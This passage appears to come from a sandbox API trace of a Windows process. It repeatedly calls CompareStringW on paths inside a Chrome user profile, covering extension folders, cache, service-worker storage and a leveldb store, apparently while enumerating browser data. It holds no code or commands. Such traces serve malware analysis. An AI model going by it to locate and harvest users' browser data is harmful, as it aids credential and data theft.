lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\", cchCount2=131) returned 1 [0286.365] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount2=130) returned 3 [0286.365] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount2=130) returned 1 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount2=130) returned 1 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\", cchCount2=130) returned 3 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\", cchCount2=130) returned 1 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\", cchCount2=130) returned 3 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount2=118) returned 3 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount2=118) returned 1 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount2=118) returned 1 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount2=118) returned 3 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount2=118) returned 3 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount2=118) returned 3 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount2=118) returned 1 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount2=118) returned 3 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\da\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\", cchCount2=130) returned 1 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\", cchCount2=130) returned 3 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\", cchCount2=130) returned 1 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\", cchCount2=130) returned 1 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 1 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\id\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 1 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 3 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\", cchCount1=137, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 1 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 1 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\", cchCount1=137, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 1 [0286.366] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 1 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount2=174) returned 1 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount2=97) returned 3 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount2=97) returned 3 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount2=97) returned 3 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount2=97) returned 1 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\", cchCount2=130) returned 1 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\", cchCount1=137, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\", cchCount2=130) returned 3 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\sr\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\", cchCount2=130) returned 3 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\", cchCount2=130) returned 3 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\", cchCount2=130) returned 3 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\", cchCount2=130) returned 1 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\", cchCount2=130) returned 3 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ru\\", cchCount2=130) returned 1 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fi\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount2=134) returned 1 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\", cchCount1=137, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount2=134) returned 1 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount2=134) returned 3 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount2=134) returned 3 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount2=92) returned 1 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount2=92) returned 1 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount2=92) returned 1 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount2=92) returned 1 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount2=92) returned 1 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\id\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\", cchCount2=139) returned 1 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\vi\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\", cchCount2=139) returned 1 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\", cchCount2=139) returned 3 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\", cchCount2=139) returned 1 [0286.368] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\cs\\", cchCount2=139) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\nl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\", cchCount2=131) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\", cchCount2=131) returned 3 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\", cchCount1=97, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\", cchCount2=131) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\", cchCount1=118, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\hu\\", cchCount2=131) returned 1 [0286.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 